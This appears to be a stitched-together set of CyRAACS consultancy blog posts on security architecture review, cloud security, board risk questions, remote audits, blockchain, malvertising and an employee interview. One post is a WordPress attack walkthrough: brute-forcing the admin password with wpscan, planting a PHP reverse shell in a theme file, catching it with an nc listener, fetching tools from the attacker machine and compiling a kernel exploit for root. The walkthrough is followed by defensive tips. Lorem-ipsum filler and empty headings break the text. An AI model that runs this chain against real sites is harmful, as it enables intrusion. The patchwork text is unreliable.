CyRAACS-logo-black-Orignal

The cyber security threat landscape is rapidly evolving. Increasingly sophisticated attacks, multiple threat actors, strict regulations on security and privacy, and new-age trends on BYOD, remote working and growing adoption of cloud, and digital transformation initiatives are just some of the varied challenges that Information Security teams face. And the lack of adequate skilled resources compounds these challenges to manage various security responsibilities. 

As news comes in every week of more cyber-attacks, Chief Information Security Officers (CISO) are searching for solutions and measures to improve their organization’s cyber security posture. Often, solution providers pitch various solutions/technologies to solve these challenges. Information Security teams assure that these solutions, with built-in next-gen features, can flag attempts to disrupt business, prevent attacks and minimize impact. 

But multiple studies and industry surveys over the years have shown that procuring and implementing a solution does not mitigate the threat on its own. Often these implementations face challenges like high costs, lack of skilled resources to manage the solutions, poor or inadequate configuration of policies, absence of integration with other solutions, insufficient supporting workflows, and processes, and so on. 

So, if just buying a solution and implementing is not enough, where does one start? The answer is Security Architecture Review — an activity that can help organizations understand their security threats and identify which solutions can mitigate these risks. The complex nature of the IT infrastructure of organizations today means that a thorough review is needed to identify the critical security risks and the solutions to address them. 

Security Architecture Review is a holistic review of security that covers networks, Data, Applications, Endpoint, Cloud, etc. It identifies gaps in your Architecture, Policies, and Controls that may put your critical assets at risk from attackers. 

So, what does a Security Architecture Review involve?

Study the organization’s Business, IT, and Security

Security Architecture Review begins with a study of the Business and IT environment of an organization and the key security and privacy requirements that are mandated by clients and regulations like GDPR, CCPA, PCI DSS, etc. Organizations wanting to adopt best practices can look at information security and data privacy standards and frameworks like NIST 800-53, ISO 27001, CSA STAR, etc. 

Identifying security and privacy risks is the next critical step as Information Security teams need to know what assets, applications, and processes need stringent controls and monitoring. 

Assess the current Security Architecture 

The next step is to study the existing architecture for network and security, understand cloud adoption, study existing solutions for security for design and implementation effectiveness, and identify gaps. We also recommend assessing the configuration of key solutions to understand the implementation effectiveness and identify any gaps. 

Understand gaps across Security Domains 

After studying architecture, it is important to assess the current solutions implemented and their design effectiveness as per the security domains such as Access, Patch, Monitoring, etc. This helps in identifying the solutions that address various security and privacy risks. 

SAR-important-for-Cybersecurity
Build the Future State

After identifying the gaps, it is important to identify the right solutions to mitigate the gaps and address critical risks. Again, the solutions must address a few key criteria–risk mitigation, compliance management, integration with other solutions and interoperability, monitoring capabilities, and the ability to provide detailed reports as per organizational policies. 

While identifying solutions, one must also consider the state of the infrastructure–On-prem, cloud or hybrid. One must also look at security components that are provided by Cloud Service Providers. 

The end-state architecture must comprise solutions that offer protection from critical risks, integrate with other solutions deployed to provide relevant alerts and minimize the impact of any attack. Finally, one must also fortify the Information Security team with Subject Matter Experts (SMEs) who will manage the solutions. 

Benefits and Outcomes of Security Architecture Review
Conclusion

No matter how secure your organization’s cyber defenses maybe, a Security Architecture Review (SAR) can identify potential vulnerabilities and recommend countermeasures. The process begins with an assessment of your current state of security, followed by the development of a roadmap for improvement. 

A SAR is especially important in the current environment, where cloud security services are becoming more popular. By definition, the cloud is a distributed system that spans multiple data centers and devices. This makes it more difficult to secure and increases the risk of data breaches. 

Fortunately, many Cyber Security Companies in Bangalore offer SAR services. They can help you identify and mitigate vulnerabilities in your systems. Reach us for more information at [email protected]

Fifteen years ago, cloud infrastructure was a new and untested concept. Today it is the dominant form of data storage and computing services. With this shift, cybercriminals have also found ways to make their attacks more effective for smaller organizations. To prepare for the coming year, we have compiled 5 benefits of cloud infrastructure security in 2021.  

Top 5 Benefits of Cloud Infrastructure Security 2021 

Comprehensive Security for All Devices  

It is important for all internet-connected devices to be secured by the most advanced cybersecurity solutions. The rise in smart home IoT devices has created more potential points of vulnerability for security breaches. The cloud moves changes data from a centralized data center to a decentralized storage service, which is considered a key differentiator when it comes to network security. Cloud infrastructure security providers must have the ability to not only protect corporate networks but individual users as well, with a focus on privacy and control.  

Easier to Scale  

Companies are realizing the benefits of cloud infrastructure. They are quicker to scale, cheaper to maintain, and more flexible. Many organizations are considering adoption due to these reasons. One thing to keep in mind is that all companies face new security threats as they move their operations into the cloud. If you don't already have a robust cybersecurity strategy in place, now's the time to make sure you're covered before jumping ship.  

Cost-Efficient  

Cloud Infrastructure Security 2021 may be the best option for companies looking to cut costs while simultaneously improving their existing security measures. Public cloud computing has become an increasingly popular alternative to on-premises private cloud deployments. Public cloud deployments offer several benefits over on-premises deployments, including lower upfront costs, elastic scalability, and the ability to scale up and down as needed.  

Improved Disaster Recovery Processes  

Disaster recovery processes have improved dramatically in recent years with the advent of cloud infrastructure security services. These services are cost-effective for businesses that are looking to grow, improve their customer retention rates, or want to reduce their capital expenses. These services affect all levels of the cloud infrastructure from firewalls and network security to data storage and encryption. In particular, the availability and affordability of cloud infrastructure security services have allowed companies to focus on their core business.  

Increased Innovation and Collaboration  

Economic growth has seen many benefits since the introduction of cloud infrastructure. One of the most prominent advantages is that it has helped to create jobs in the technology sector, which in turn has created more competition in an industry with high barriers to entry. Cloud data storage has allowed organizations to save money on hardware and operating expenses, while also allowing them to access their information anywhere they need it.  

Conclusion  

Cloud infrastructure security is a complex and diverse field. The number of IT professionals who specialize in cloud infrastructure security is growing at an exponential rate, but the demand for qualified talent outpaces supply. It's important for organizations to make sure they have a comprehensive understanding of what cloud infrastructure security entails and how it can add value to their company.  

security-risk-management-CyRAACS-blog

Executive leaders of organizations and board members are ultimately responsible for ensuring the long-term security of their organization, and it helps in mitigating cyber risks. As board members realize how critical risk and security management is, they ask leaders more nuanced and complex questions. Interest in security and risk management (SRM) is all-time high at the board level. In 2019, Gartner conducted the security and risk survey and realized that four out of five respondents noted that security risk influences decisions at the board level. 

The Gartner research helps security and risk management leaders analyze five categories of questions that should be prepared to answer at any executive or board-level meetings. Here are those questions. 

Let’s discuss each of these in detail. 

The Trade-Off Question_ Are we 100% secure?  

The trade-off question is that the security and management risk leaders struggle a lot. The question "Are we secure?" needs improvising and is generally asked by the board members who are uneducated and unaware of the impact of security risks on the business. In this scenario, it is impossible to prohibit 100% of the incidents. The CISO's responsibility is to help identify and evaluate the potential risks for an organization and allocate resources to manage them.  

According to Gartner's report, a security and risk management leader in response to this question might say, 

"It is impossible to remove all resources of the information risk considering the evolving nature of the cyber threat landscape. My responsibility is to work with other aspects of the business to execute controls for managing security risks that can prevent us from improving operational efficiency and brand image. There is no such thing as 'perfect protection' in security. We have to reassess continually how much risk is appropriate as the business grows. We aim to develop a sustainable program to balance the requirements to protect against the needs to run a business”. 

The Landscape Question_ How bad is it out there? 

Most of the board members want to know their security compared to peer organizations. They read threat reports and blogs, listen to the broadcast, and even are forced by the regulation to understand such things. Gartner recognizes the need to discuss this landscape. Leaders need to avoid trying to quantify risks to possible extent and attaching certain budget figures to the mitigation cost depending on something external. Moreover, when benchmarks give some material for conversation, they must be a negligible factor in the decision-making process.  

Here are some responses that security and risk management leaders can give while discussing the wider security landscape. 

External Events Responses 
Our primary competitor experienced a public, successful attack. We have a similar vulnerability that can facilitate the attack, and we are addressing that weakness. Enhanced monitoring abilities have been implemented. 
There is an increased number of attacks against the electricity grids in three of the national presence points. We don't expect to become a direct target. Business continuity plans are being tested and updated to overcome the prolonged outage. 
We fall under the scope of the new EU General Data Protection requirements. We have conservative and cautious privacy practices in place. 

The Risk Question_ Do we know what our risks are? 

A risk outside the tolerance needs an antidote to bring it within tolerance. It does not require dramatic changes in a short time, so beware of overreacting. In the Gartner report, they present a way to defend the risk management decision, and you can change it according to your organization's risk tolerance.  

One of the most common issues encountered in the report is that the evaluations are subjective and depend on the flawed methodology. Security leaders must have evidence to support the evaluation, even when they are not called to present it. Another aspect that needs to be considered is whether to depict the typical outcome or the worst. For instance, most incidents in mild outcomes are within the ability of most companies to absorb. However, there is an infrequent incident that can result in a catastrophic outcome.  

The Performance Question_ Are we appropriately allocating resources? 

Security is always a moving target. The security team needs to demonstrate their behavior to ensure the organization stays safe. It is particularly important to figure out if the resources are allocated appropriately and where the money is spent. The original strategy proposal should have margins for errors concerning the deadline and the budget. As far as there are overruns within these margins, they must be noncontroversial.  

There may be valid reasons even if the overruns are outside the margins. The balanced scorecard approach is a way to understand how security contributes to business performance. In this approach, the top layer defines the business aspiration, and organization performance against those aspirations is expressed using a traffic light mechanism. However, it's not the only way. Some organizations have different types of dashboards to discuss business performance.  

The Incident Question_ How did this happen? 

An incident is unavoidable, and treatment is a blessing in disguise. Security and risk management leaders should be aware that in some scenarios, incident details may have been tightly controlled (such as sensitivities associated with the incident). Using the fact-based approach and explaining your knowledge will eliminate the mystery and give confidence that you have control over the incident. Acknowledging the incident provides details on the business impact, outlines the flaws or gaps needed to work out, and offers a mitigation plan.  

Decipher Complex Board Question 

There are usually no deterministic answers to the board question, and responses are generally more about showing options for sponsorship instead of a definitive course of action. The options can vary based on the context of the discussion, the maturity of the board, the communication skills of the SRM leader, and the frequency of reporting. However, understanding and answering board questions require everyone to understand their roles. Therefore, the SRM leader should know that the board is interested in facilitating the business goal.  Any query that may seem immature, ignorant, or complicated has a purpose behind it. 

Wish you all a very happy 2021 and be a year filled with success, good health, and happiness to you and all your loved ones. With the year 2020 and the pandemic overwhelming us, we must be conscious of the increase in cyber security threats that are looming in front of us. Here are a few thoughts and considerations for the unenviable role of the CISO for a great start to 2021!

Make the management part of your problem

Senior management does not know the technicalities of how the breach occurs, nor they should need to know. However, they should be clearly aware of the risks thereof. Ensure that the senior management/ board is completely up-to-date of all risks. Increase your frequency of meetings and provide a crisp update of the open risks and how you are working to mitigate them with clear established timeline and dependencies. Costs and budget overruns should be highlighted ahead of time. Bring in business-friendly and business-relevant cyber security metrics and report them periodically. This way the management is more forthcoming in providing the necessary authority and help prioritize your initiatives.

Get the appropriate budget

Budget definition and allocation on a percentage of IT spend, a percentage of cost of breach, a percentage of business growth YOY – various models exists. While each has its benefits and pitfalls, the budget should be commensurate with your risk appetite. Continuing from the point above on having the management ‘onboard’ on cyber security initiatives will pave a long way in ensuring that an appropriate budget is allocated. Let us understand one thing clear. The world expects ‘more’ with ‘less’

Clearly identify your security partners

One of the top fields where the skills available and the market-needs gap is widening. It is expected that with the CAGR of 17% in cyber security (products and services), this area can become the CISO’s nightmare quickly. Relying on experts to do the job is also essential. This can be problem-solved by engaging the right eco-system partners to do your job. Security technologies, security governance, security operations are niche areas and picking the right partner will ensure that they stay with you and provide you the much-needed assurance and help address your problem by bringing in the right skills. Remember, it is not required to boil the ocean.

Evolve Your Security to Protect Your Remote Infrastructure

Secure your remote workforce by proactively protecting against zero-day malware and phishing, consider human and technological factors to avoid falling victim to phishing attacks. In response to the coronavirus pandemic, Gartner analysts observed a more than 400% increase in client inquiries related to remote access technologies for the months of March, April, and May in 2020, compared to the previous three months. Furthermore, a recent Gartner survey reveals that 41% of employees are likely to work remotely post coronavirus pandemic.

Continuous monitoring for all critical assets 

90% of breaches in cloud-based infrastructure were due to configuration-related issues. Periodic assessment ( like once a year, once a quarter) may not be sufficient in today’s scenario. The new buzzword is continuous monitoring.  Continuous monitoring of critical assets would be an aid to enable rapid detection of compliance issues and security risks within the IT infrastructure that could lead to compliance violations. This would help understand real-time changes to the infrastructure and with a good threat intelligence feed it is possible to address zero-day attacks with much robustness with effective continuous monitoring.

Please reach out to us to know more about this to [email protected] or personally to me at [email protected].

Providing insights in the changed risk and opportunity landscape

Global situations relating to the COVID-19 pandemic have impacted the business and has also impacted the work of auditors. The current situations challenge the conventional methods adopted for an audit. The current uncertainty and unpredictability may create risks of material misstatement in the audits.

There anyone who loves or pursues or desires to obtain pain of itself, because it is pain, but because
occasionally circumstances occur in which toil and pain can procure him some great pleasure. To take a
trivial example, which of us ever undertakes laborious physical exercise,

Predicting the unpredictable: Adapting to the changing needs” has always been a key mantra, and this holds true today with the emergence of COVID-19.

Considering the recent situation and the paradigm shift in business operations CyRAACS would advise the audit teams to adopt the below methods for a precise, fact-based audit.

1. Re-evaluate the audit scope

With the change in the mode of business operations and the technology implemented, auditors may have to relook at the scope of the audit. Include the technology and architecture deployed to support remote working. Auditors may have to re-evaluate the effort estimates and timelines based on the changes in the scope of the audit.

2. Utilize Collaboration tools and communicate

Conference or video call facilities or collaboration tools such as Skype, Teams, Slack, etc. allow for regular communication with clients and team members. Extensively use the collaboration tools to communicate what you need and what you have been working on. An additional point to note while implementing these communication and collaboration technologies is to keep an eye on the advisories issued with the vulnerabilities identified in these technologies. Any open-source tools adopted may be evaluated for any security flaws before implementation.

3. Use cloud services for storing evidence

Utilize cloud storage services to collect audit evidence. The cloud services like OneDrive, SharePoint enable gathering adequate, appropriate audit evidence remotely. Ensure all security controls are implemented in the cloud service being used for restricting any data leakages. Additionally, ensure that the current cloud platform being used is accessible to all stakeholders required to provide data for the audit.

4. Technology controls to be stringently implemented by the IT Team

In the event of the recent crisis and the work from home model adopted globally, the IT team may be evaluating stricter and stringent controls on implementing digital certificates, Multi-Factor Authentication to the environment, etc. Auditors may integrate the additional security controls in their methodology to adapt to the changing environment.

5. Check for regulatory/contractual requirements for evidence sharing

All the regulatory requirements for data hosting, data sharing may be validated before sharing the data with the auditors. In the case of strict organizational policies on data sharing, organizations may create a segment or a white room for the auditors to securely review the evidence.

6. Centralize work performed by other auditors

Centralize the audit engagement and the documentation on the cloud platform. This would enable the audit team to coordinate and review the work of auditors to meet the requirements in auditing and reporting standards.

7. Flexibility in reporting audit findings

As audit teams respond to the crisis and changing business risks in differing ways there may arise a need for more adaptable and flexible auditing techniques During this period, auditors may not be restricted to the traditional reporting methods and may consider different reporting templates like unrated reporting, e-mail reporting, mid-review reporting.

8. Reassess key risks in a real-time environment

Risk changes rapidly with the slightest change in the environment. Re-Assess the current environment to identify the new threat landscape and associated risks. The exercise would give insights into the changing risk landscape and aid in developing a robust risk mitigation strategy.

Additional Articles for a good read and understanding of global security controls and audits:

1. NBS Special Publication 500-153: Guide to Auditing for Controls and Security: A System Development Life Cycle Approach

2. NIST Special Publication 800-53 A: Assessing Security and Privacy Controls in Federal Information Systems and Organizations.

Introduction

WordPress is a free and open-source PAAS structure that is being used by millions across the globe as a content management system. Its features include the integration of various plugins and themes.

Also, there are many vulnerabilities associated with the plugins and themes being used within WordPress to date. According to the statistics, 73.2% of the most popular WordPress installations are vulnerable to date. These can be identified using automated tools and can be exploited. One such example is explained in this blog on how an adversary can gain root access by exploiting a vulnerability present inside the WordPress theme engine.

There anyone who loves or pursues or desires to obtain pain of itself, because it is pain, but because
occasionally circumstances occur in which toil and pain can procure him some great pleasure. To take a
trivial example, which of us ever undertakes laborious physical exercise,

Below are the steps to perform Privilege escalation for a vulnerable WordPress theme engine:

Nmap Enumeration

Run Nmap enumeration scan to discover the open ports and services running on the target host.

Nmap reveals HTTP service running on port 80. Also, the directories discovered in the HTTP-enum scan points to the WordPress login page.

WordPress Login Panel

Browse to the login page of WordPress http://*target IP*/wp-login as shown in the screenshot below:

Now, to retrieve the username and password we need to run a brute-force scan using WPScan.

WPScan is a scanner built for enumerating and brute-forcing the usernames and passwords for WordPress.

WordPress enumeration using WPScan

Let us first enumerate a user enumeration scan to discover the user accounts linked with WordPress using the below command:

wpscan –url *target IP* –enumerate u

The user enumeration scan reveals the usernames of the users linked with WordPress account as shown in the screenshot below:

Run a Bruteforce scan

Now that we have the username, we shall run a brute-force scan to enumerate the password for the admin account. We will a run a brute-force scan to enumerate the password for the admin account for which we use the below command:

wpscan –url *target IP* –wordlist /root/rockyou.txt –username admin

As shown in the below screenshot, as part of the brute force scan we get the username and password for the admin account. The password for the admin account is princess.

Using the username and password obtained in the WPScan we try to login into the WordPress site and navigate to the themes section in the WordPress. WordPress plugins and themes are the vulnerable points for any WordPress website.

WordPress Theme Engine

After login navigate to Appearance>Themes>Editor

Now, we observe that there are multiple .php files in the templates and archives section. We could use any of these to upload the PHP reverse shell. For example, we will try to use archive.php file to upload the PHP reverse shell.

Replace the contents of archive.php file and replace it with our PHP reverse shell.

PHP Reverse shell to gain local privilege

In this case, let us use a PHP reverse shell that is downloaded from pentest monkey.

Run the below command and download the shell:

wget http://pentestmonkey.net/tools/web-shells/php-reverse-shell/ php-reverse-shell-1.0.tar.gz

Unzip the file using $tar -xzf php-reverse-shell-1.0.tar.gz command and copy the contents of the file in archive.php file in the browser.

The IP address and port should point to the attacking system’s IP and listener port as shown in the screenshot below:

Click on the update file at the bottom of the page and we observe that the files get updated successfully with the PHP reverse shellcode.

Gaining local user access

Now, open a new terminal and start a netcat listener on port 443 which is specified in the PHP reverse shell script using the below command:

·        nc -nvlp 443

Now, navigate to the modified archive.page in the browser using the below link:

·        http://*target IP*/wp-content/themes/twentytwelve/archive.php

As shown in the screenshot below, after traversing to the modified archive.php file in the web browser we get a low privilege reverse shell from the attacking systems IP to the victims IP.

We got a low privilege access for webserver user “www-data”.

The next step is to elevate the privilege and get root access.

Let us run a Linux privilege checker python script to enumerate the system info and check for the world-writable files.

For that run python server using the below command to transfer file from attacker’s system to target system

python -m SimpleHTTPServer 80

Checking file permissions using Privchecker

Download the linux.privchecker.py file on the tmp directory of the target system using the below command

wget http://*local IP*/linuxprivchecker.py

After enumerating we also know that the world-writable directory is the tmp directory for the user www-data.

Local Privilege Escalation

We know that the Linux version in use is Linux 2.6.32. Let us download a python script from exploitdb named as Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) – ‘CAN BCM’ Local Privilege Escalation.

Download the script in the world-writable directory “tmp” which was discovered as part of the enumeration scan.

This script might be helpful in elevating from local privilege to root privilege.

Compile the script using the below command and save it in the output file named as rootpriv:

·        gcc 14814.c -o rootpriv

Now, run the output file using ./rootpriv command.

Gaining Root Access

Once the script is successfully executed using whoami check the current user.

We get access to the ROOT account as shown in the below screenshot:

Check for the files present in the root directory.

There is an interesting file wp.sql which has all the database tables and values in it which could be used to craft SQL injection attacks. Below are the contents of wp.sql file:

The blog summarizes how a user can gain root access using a vulnerable WordPress theme engine.

There are many other loopholes in WordPress that can be used to elevate privilege and retrieve sensitive information.

Preventive measures

Below are the measures you can adopt to keep your WordPress site secure:

1.   Sucuri Scanner

Install and use WordPress security plugin – Sucuri Scanner.

We need to set up an auditing and monitoring system that keeps track of everything that happens on the website. This includes file integrity monitoring, failed login attempts, malware scanning, etc.

The best part about Sucuri’s firewall is that it also comes with a malware cleanup and blacklist removal guarantee. Basically, if you were to be hacked under their watch, they guarantee that they will fix your website (no matter how many pages you have).

2.   Change the Default “admin” username.

In the old days, the default WordPress admin username was “admin”. Since usernames make up half of the login credentials, this made it easier for hackers to do brute-force attacks.

Since WordPress doesn’t allow you to change usernames by default, there are three methods you can use to change the username.

3.   Disable File Editing

WordPress comes with a built-in code editor which allows you to edit your theme and plugin files right from your WordPress admin area. In the wrong hands, this feature can be a security risk which is why we recommend turning it off.

4. Add Two Factor Authentication

The two-factor authentication technique requires users to log in by using a two-step authentication method. The first one is the username and password, and the second step requires you to authenticate using a separate device or app.

Most top online websites like Google, Facebook, Twitter, allow you to enable it for your accounts. You can also add the same functionality to your WordPress site.

5.   Strong Passwords and User Permissions

Many systems and applications include functionality that prevents a user from setting a password that does not meet certain criteria. Functionality such as this should be leveraged to ensure only Strong passwords are being set.

6. Keep WordPress Updated

Since WordPress is open-source, anyone can study the source code to learn and improve it. You need to make sure that all your WordPress plugins, themes, and the core itself are always up to date.

7.   Disable Directory Indexing and Browsing

Directory browsing can be used by hackers to find out if you have any files with known vulnerabilities, so they can take advantage of these files to gain access. Directory browsing can also be used by other people to investigate your files, copy images, find out your directory structure, and other information. Therefore, it is highly recommended that you turn off directory indexing and browsing.

Introduction

Blockchain is an emerging technology that is quite popular nowadays due to the popularity of cryptocurrency. Apart from blockchain being used in cryptocurrency, it is also marketed as a cure for a lot of things including cybersecurity. Blockchain is considered to be a nearly impenetrable technology as by design, blockchain is resistant to modification of the data. The blockchain contains a list of records or blocks which are linked using cryptography. Each of those individual records/blocks contains information and data that are combined together and verified. Information such as a cryptographic hash function of the previous block, timestamp, and transaction details are permanently recorded in a distributed ledger. The ledger is decentralized in nature, all transactions are done across a peer-to-peer network. Blockchain technology is designed in such a way that there is no central authority or storage location. Every user on the network plays a part in storing some or all of the blockchain. Everyone is responsible for verifying the data that is stored and/or shared to make sure false data cannot be added and existing data cannot be removed.

Blockchain technology has been around for more than a decade. It was invented by a person using the name Satoshi Nakamoto in 2008 to serve as the public transaction ledger of the cryptocurrency bitcoin. However, as technology has gradually spread worldwide, people have begun using it in a variety of ways in numerous industries, including as a means to increase cybersecurity. Blockchain is a chain of records that leads to the formation of a distributed network that can have millions of users all over the world. Every user can add information to the blockchain and all data in the blockchain is secured through cryptography. Every other member of the network is responsible for verifying that the data being added to the blockchain is real. This is done using a system of three keys private, public, and the receiver’s key that allow members to check the veracity of the data while also confirming whom it comes from. The verified data then form a block and will be added to the chain of data. In order to make updates to a particular piece of data, the owner of that data must add a new block on top of the previous block, creating a very specific chain of code.

Blockchain Implementation in Cyber Forensics

The network being accessed by an unauthorized person can lead to data being either stolen or damaged. Hence, it becomes essential for an individual or organization to determine the invasion. The mode of collecting and preserving evidence has a significant role to play in ensuring that the evidence is accountable in the courtroom during various situations such as lawsuits or criminal complaints.

Identifying the attack/breach and generating the required documents about the causes of cyber-attack or cyber fraud can be accountable through the use of blockchain technology. Truth-based evidence is always important in any cybercrime investigation. Digital evidence moves down the hierarchy through the chain of custody in the different levels of transactions in any investigation process. Blockchain technology can provide a clear and exhaustive view of the transactions that have taken place concerning the evidence, right from the time the evidence originated from the source [2].

There are many reported cases of missing police evidence and several of them go unaccounted for giving an easy way out for criminals, such types of things can also be prevented using blockchain technology. It can enable appropriate authorization to those who are permitted to enter the evidence room, whether electronic, magnetic, or by using private keys. The scientific approach in digital forensics flow through the search authorities, the chain of custody of evidence, imaging and hashing function, validation of data using appropriate tools, report-ability, and repetition of presentation. The entire process can be made data-centric using blockchain technology.

The hash validation with the blockchain and the timestamp will prevent repeatability and contamination of information. Keeping a clear and unique track of who accessed what and when will help to avoid the contamination of evidence and information. The blockchain technology-based application can be used to ensure proper operating practice when it comes to evidence management practices. Necessary questions like How the core data is stored, how it is communicated, who is the person responsible for handling the data, and the factors that contribute to the physical security of the data can all be streamlined efficiently. Ideas such as working with the duplicate copy and not with the original can be validated using the hash. The Hash function will take the data and will generate a fixed-sized bit sequence in the output. Thus, creating a digital fingerprint of the input data.

Blockchain Implementation in Cyber Security

The number of people joining the world wide web and technology is continuously growing and developing at a very fast rate, more data gets produced and more hackers will attempt to steal or corrupt that data. The technology behind blockchain is flexible and unbelievably helpful for the future of the Internet, permitting users to better secure their data. Innovative uses for blockchain technology are already becoming a part of other fields beyond cryptocurrencies and can be especially useful to boost cybersecurity. Blockchain implementation will facilitate in forestall a lot of threats and attacks in a very system and might forestall the information from being taken or destroyed. A number of the items that blockchain will facilitate are: –

  I.       Preventing Fraud and Theft of data: – Blockchain technology provides one of the best securities to protect data from hackers by preventing potential fraud and decreasing the chance of data being stolen or compromised. In order to destroy or modify blockchain, a hacker would have to destroy the data stored on every user’s computer in the global network. This could be millions of computers, with each one storing a copy of some or all the data. Bigger blockchain networks with more users have an infinitely lower risk of getting attacked by hackers because of the complexity required to penetrate such a network.

   II.       Preventing Distributed Denial of Service (DDOS) Attacks: – Hackers can use several techniques to launch an attack, most common is sending a large number of requests/packets to the system until the system becomes unable to process these requests/packets and leading to the failure/crash of the system. DDoS attacks have been happening at an increased frequency recently, affecting bigger companies like Twitter, Spotify, SoundCloud, and more. The current difficulty in preventing DDoS attacks comes from the existing Domain Name System (DNS). The fact that it is only partially decentralized means that it is still vulnerable to hackers because they are able to target the centralized part of DNS and continue crashing one website after another. Implementing blockchain technology would fully decentralize DNS, distributing the contents to a large number of nodes and making it nearly impossible for hackers to attack. Domain editing rights would only be granted to those who need them (domain owners) and no other user could make changes, significantly reducing the risk of data being accessed or changed by unauthorized parties.

  III.       Decentralized Storage Solutions: –

Data is becoming more valuable than gold and oil. Every business and individuals accumulate tones of sensitive data about themselves or customers. Unfortunately, this data is also quite attractive to hackers. And one of the most convenient things you do for cybercriminals is to store all of it in one place. The business mainly is still using centralized storage when it comes to data. Blockchain-based storage solutions are slowly gaining popularity. An example of this can be Apollo data cloud which is developed by the Apollo Currency team allows users to archive data on the blockchain and grant permission for access to third parties. The cryptographic access key can be revoked at any time, further reducing the risk of a breach. Thanks to the decentralized nature of blockchain technology, hackers no longer have a single point of entry, nor can they access entire repositories of data in the event that they do get in.

Introduction

Malvertisements are malicious advertisements distributed in the same way as legitimate online advertisements. It is one of the common practices to use spread malware. Cybercriminals use the advertising strategy by pretending as legitimate campaigns. Those malvertisements will either attempt to download malware directly onto visitor’s systems/devices or redirect visitors to websites meant to spread ransomware, viruses, or other malicious programs. The process of creating malvertisements and spreading malware is called malvertising. Malvertising is a favoured medium for criminal behaviour as it takes advantage of consumer trust in both companies running campaigns and advertising networks.

Ad networks are responsible for distributing real and fraudulent advertisements. The reliability of a website does not necessarily determine and has also been irrelevant to some extent to whether or not it will contain malvertisements. But saying that at the same time is the best place to be not infected with malvertisements. Recent examples have proven that even the most well-known, legitimate sites can distribute malvertisements unknowingly. In recent years, reputed sites such as Forbes, The New York Times Online, London Stock Exchange, Spotify, etc have all been negatively impacted by malvertising campaigns that infected visitors with malware.

Malvertisements vs Adwares

People, in general, are confused between malvertisements and Adwares as they both deal with affecting online advertisements. Adwares are a program running on a victim or user’s system which is packaged with other legitimate softwares. Adware displays unwanted advertising, redirects search requests to advertising websites, and mines data about the user to help target or serve advertisements.

Key differences between malvertisements and adwares are:

1.    Malvertisements involve deploying or injecting malicious code on a publisher’s web page. The targeted audience of malvertisements are not individual or selected users whereas Adware, however, is only used to target individual users.

2.    Malvertisements are only dangerous and affect users that view the infected webpage or website whereas adwares once gets installed keeps on operating on the user’s computer.

How Malvertisements Distribution Works?

Malvertisements are distributed via the same methods as normal online advertisements. Infected graphic files are submitted to a legitimate advertisement network with hopes that the advertiser won’t be able to differentiate between trustworthy ads and harmful ones. Advertisements generally attract and encourage viewers to click. When approved by the advertisers these malicious advertisements are added or distributed on legitimate sites. In some cases, cybercriminals will even re-register expired, but previously legitimate, domains to disguise themselves as trustworthy domains. Criminals can use redirects to send clickers to a malicious site, and users remain ignorant because they expect redirects when clicking on an ad. While on the malicious website, code will run in the background which will attempt to download malware onto the device. This unintentional download of a virus or malicious code is known as a drive-by download. Malvertisements often use drive-by attacks to download ransomware onto targeted computers. Advanced forms of malvertisements can even install malware on visitor’s devices directly from the legitimate website that is displaying the ad and without any interaction from visitors.

Malware Insertion Techniques

Attackers or people with malicious intent use several delivery mechanisms to insert their malicious codes into advertisements.

1.    Malwares in Advertisements calls: When a website shows a page featuring an ad, the ad exchange delivers advertisements to the user through a variety of third parties. An attacker can compromise one of these third-party servers, who can attach malicious code to the ad payload.

2. Post-click malware injection: Users who click on an ad are typically redirected between multiple URLs, ending with the ad landing page. If any of the URLs along this delivery path are compromised by an attacker, they may execute malicious code.

3.    Malware in Text or Banner Advertisements: Malware may be found in a banner ad or text message. For instance, an ad can be delivered in HTML5 as a combination of images and JavaScript which may contain malicious code.

4.    Malware within a pixel of an image: The pixels are embedded with codes in an advertisement call. A legitimate pixel sends data to the server for tracking purposes. If an attacker intercepts a pixel’s delivery path, it can send a response, containing malicious code, to the user’s browser.

5.    Malware within the video: Video players don’t protect against malware. Examples can be videos based on flash or specific video formats such as VAST. Video format VAST contains pixels from third parties, which could contain malicious code. Videos based on flash can inject an Iframe into the page, which downloads malware, even without having the user click on the video. Flash files might also load a pre-roll banner and attackers can inject malicious code into the pre-roll banner, and it can run even without the user clicking on the video.

Malvertisements: With or Without User Interaction

Common malvertisements generally need user interaction in order for the malwares to be downloaded in a victim’s system or infect the victim/user’s system. User interaction can be victims clicking on an unsafe malicious advertisement. Following attacks or things that might happen on users viewing or interacting with malvertisements:

1.    Download or installation of malwares on the computer or systems viewing those malicious advertisements.

2.    Redirect the user or victim to a malicious site.

Some advanced malvertisements can affect or cause harm to a user without user interaction. Malvertising might perform the following attacks on users viewing the malvertisements without clicking it:

1.    A “drive-by download” — installation of malware or adware on the computer of a user viewing the ad. This type of attack is usually made possible due to browser vulnerabilities.

2.    Forced redirect of the browser to a malicious site.

3.    Displaying unwanted advertising, malicious content, or pop-ups, beyond the ads legitimately displayed by the ad network. This is done by executing Javascript.

Identification of Malvertisements

Malvertisements Mitigations and Best Practices:

What is your name and job title in CyRAACS?

My name is Anamika, I lead the Application security VAPT projects in CyRAACS.

How would you summarize what you do? Why CyRAACS is a great place to work

At CyRAACS I am responsible for managing and leading VAPT projects wherein we must conduct VAPT assessments for IT Systems, Web applications, Mobile applications, and critical network infrastructure. We as a team conduct manual application penetration testing of thick client applications, mobile applications, web applications and web services, API’s to minimize exposure to attacks.

I am responsible to communicate with client teams often to explain and demonstrate vulnerabilities to application/system owners and assist with the mitigation of the identified vulnerabilities. I support fast-paced delivery in challenging projects. My job requires me to be highly motivated, detail-oriented, and client-focused.

CyRAACS is a great place to work because every day provides an opportunity to learn something new, to mentor, and to be mentored to achieve our client’s goals. Being part of a team that is focused and dedicated to stand up to client expectations and help employees succeed, is the best thing anyone can ask for in their career.

How long have you worked with CyRAACS?

I had the pleasure of working in CyRAACS for near to 3 years now.

What is the most interesting thing about working in CyRAACS, and about the work you do?

CyRAACS follow a no hierarchy model wherein the management keeps their doors open to promote new ideas and transparency of information within the organization.

My job demands me to be constantly updated with the latest technologies to challenge myself to know more about the trend revolving around cyber security. I like the fact that I can interact with the key stakeholders and technical team to suggest security remediations in line with their business scenario.

My journey through these years has seen many changes come through in the organization, and each time, these have been for the better, for the leadership in CyRAACS is committed to make CyRAACS a big success story in the coming years.

What are three benefits you have discovered about working in CyRAACS that you weren’t aware of when you started?

My journey at CyRAACS has been very gratifying and rewarding. I always had opportunities and challenges beyond my current role which helped me prove myself and achieve greater heights.

CyRAACS has helped me achieve my professional goal by sponsoring my certification.

